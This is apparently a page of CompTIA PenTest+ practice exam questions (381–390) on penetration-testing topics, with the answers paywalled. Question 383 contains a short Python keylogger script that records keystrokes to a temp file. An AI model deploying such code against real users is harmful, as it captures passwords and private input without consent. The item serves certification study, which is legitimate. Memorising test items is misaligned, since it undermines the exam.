ExamGecko
Home / CompTIA / PT0-002 / List of questions
Ask Question

CompTIA PT0-002 Practice Test - Questions Answers, Page 39

Add to Whishlist

List of questions

Question 381

Report Export Collapse

Which of the following best explains why communication is a vital phase of a penetration test?

Become a Premium Member for full access
  Unlock Premium Member

Question 382

Report Export Collapse

Which of the following describes how a penetration tester could prioritize findings in a report?

Become a Premium Member for full access
  Unlock Premium Member

Question 383

Report Export Collapse

During an assessment, a penetration tester emailed the following Python script to CompTIA's employees:

import pyHook, sys, logging, pythoncom, datetime

log_file='C:\\Windows\\Temp\\log_comptia.txt' def KbrdEvent(event):

logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii)

logging.log(10, chr(event.Ascii))

return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = KbrdEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

Which of the following is the intended effect of this script?

Become a Premium Member for full access
  Unlock Premium Member

Question 384

Report Export Collapse

For an engagement, a penetration tester is required to use only local operating system tools for file transfer. Which of the following options should the penetration tester consider?

Become a Premium Member for full access
  Unlock Premium Member

Question 385

Report Export Collapse

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

Become a Premium Member for full access
  Unlock Premium Member

Question 386

Report Export Collapse

Which of the following would be the most efficient way to write a Python script that interacts with a web application?

Become a Premium Member for full access
  Unlock Premium Member

Question 387

Report Export Collapse

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?

Become a Premium Member for full access
  Unlock Premium Member

Question 388

Report Export Collapse

A penetration tester approaches a company employee in the smoking area and starts a conversation about the company's recent social event. After a few minutes, the employee holds the badge-protected door open for the penetration tester and both enter the company's building. Which of the following attacks did the penetration tester perform?

Become a Premium Member for full access
  Unlock Premium Member

Question 389

Report Export Collapse

A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?

Become a Premium Member for full access
  Unlock Premium Member

Question 390

Report Export Collapse

After performing a web penetration test, a security consultant is ranking the findings by criticality. Which of the following standards or methodologies would be best for the consultant to use for reference?

Become a Premium Member for full access
  Unlock Premium Member
Total 464 questions
Go to page: of 47
Search

Related questions